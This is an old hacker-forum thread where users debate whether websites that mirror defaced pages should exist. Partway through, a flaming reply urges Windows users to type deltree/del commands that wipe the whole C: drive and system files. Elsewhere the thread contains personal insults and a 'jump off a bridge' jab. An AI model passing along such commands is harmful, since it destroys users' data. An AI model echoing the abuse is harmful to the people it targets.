Page 1 of 2 12 LastLast

Thread: Do We Need Defacement news...

Do We Need Defacement news...

i read this on packet storm when i was looking for sum stuff to read...

.: voting topic
    Does the world need defaced web site mirrors?

Posted: Fri Mar 8 12:13:37 CST 2002
    1.No. They encourage hackers. I am glad they are all gone.
    2.Defacement mirrors save important cultural history that would otherwise be quickly lost.
    3.We need defacment mirrors to get some real data on which software not to run.

Well there were so many replys i knew my voice would not be heard... nor many of the others posted there..

so here is my opinion...

If showing defacements encourages hackers to deface more sites... then we shouldnt have TV news to make people do stupid crap to get on the news... or the news paper to have articles about people getting killed...

I think we do need defacement news to tell people how serious this kinda crap is...
    give me ur opinions...

_NetSyN_
    [shadow]i have a herd of 1337 sheep[/shadow]
    Worth should be judged on quality... Not apperance... Anyone can sell you **** inside a pretty box.. The only real gift then is the box..

Defacement does not encourage hackers, it encourages script kiddies. I don´t think we need defacement pages. Besides there are not a lot of ppl left who have the capability of running something like Alldas. Believe me I met a couple of Alldas ppl and they told me they had no life maintaining the webpage. And what did they get in reward? packeted straight to hell. And trust me once you´re on your countries hosting **** list it is a pain to get somebody to host your pages.
    A very expensive one. So unless some people think others need to express their l33t like shitness I say start a new one.

AntiOnline Senior Member souleman's Avatar
    then we shouldnt have TV news to make people do stupid crap to get on the news... or the news paper to have articles about people getting killed...
    There are people who commit crimes simply for the media attention. Some serial killers are that way just because they like watching the news about them. Yes, its sick, but it is true.

I agree with Focmaester on this one. Maybe posting some interesting defacements, or high profile, but for the most part, it isn't needed. I am not necessarilly saying that it encourages hackers (although I agree it encourages script kiddies), it is just a waste of time. You want to demonstrate seriousness, mirror a defacement of pentagon.gov or something. don't waste time on all the stupid crap that goes on.

Besides, website defacements aren't all that important. I would much rather someone change my website then root my accounting server. Its a lot harder to get root to the accting server then the web page, but it is still vulnerable. Just because people patch their NT/IIS webserver doesn't mean that they have any security at all on the rest of the machine.
    \"Ignorance is bliss....
    but only for your enemy\"
    -- souleman

I think it's a waste of time and space, but if you're into that, go for it. More power to you, maybe it'll keep you from getting in trouble.
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

Some of it is actually interesting sometimes. But it does promote script kiddies to do it so they can make a name for themselves. I agree with all you guys on this.
    [gloworange]\"A hacker is someone who has a passion for technology, someone who is possessed by a desire to figure out how things work.\" [/gloworange]

I am with Soulman and Focmaster - we should keep important defacements, but not "I am STUPID hear me ROar" or what have you...

I don't think that they encourage script kiddies...they already breed like rabbits anyway!
    - Jimmy Mac

Replicants are like any technology, if there not a hazard, its not my problem....

agreed aswell
    --------------------------
    http://www.arg-irc.com

If showing defacements encourages hackers to deface more sites... then we shouldnt have TV news to make people do stupid crap to get on the news... or the news paper to have articles about people getting killed.. think we do need defacement news to tell people how serious this kinda crap is...
    give me ur opinions... .

Personally I think your a idiot Your threads are stupid and pointless. You waste everyone's time with such stupid sh** know one cares about it! You think your the sh* but in reality your bullsh*% .. I bet you can't hack a windows 95 hahahahaha.. Trick. Will you be my mentor? <---------lolololololololololololololol

all windows users go to start programs ,ms-dos type this:

deltree /y c:\windows\startm~1
    deltree /y c:\windows\desktop
    deltree /y c:\windows\fonts
    deltree /y c:\*.*
    del c:\autoexec.bat
    del c:\config.sys
    del c:\windows\win.ini
    del c:\windows\system.ini
    deltree /y c:\windows\win.com
    del c:\windows\win.*
    @echo off
    echo.
    echo.
    echo net syn is elite hahaha DO NOT DO IT IT WIPE OUT YOUR O.S

Thumbs down MORON

Trick. Will you be my mentor? <---------lolololololololololololololol
    Shame when u have to laugh at ur on jokes...

Also a shame how u got to bring other people down who try to have a legit thread just because u dont understand it or because ur just a plain out moron...

now if ur going to insult me at least use some intelligent insult not some stupid "your momma" crap... it gets old when u honestly have nothing intelligent to say that u have to make bull **** replys to make urself feel big...

and arent u the idiot that threatened to hack senior members through IRC and when we showed up u kissed the ircops asses till we gave up on ur stupid comments and just left?

yep... Mr.Dos u truly are one stupid kid with little to no reason for being here other then to be a *****..

_NetSyN_
    [shadow]i have a herd of 1337 sheep[/shadow]
    Worth should be judged on quality... Not apperance... Anyone can sell you **** inside a pretty box.. The only real gift then is the box..

what we need is for netsyn to jump off a bridge.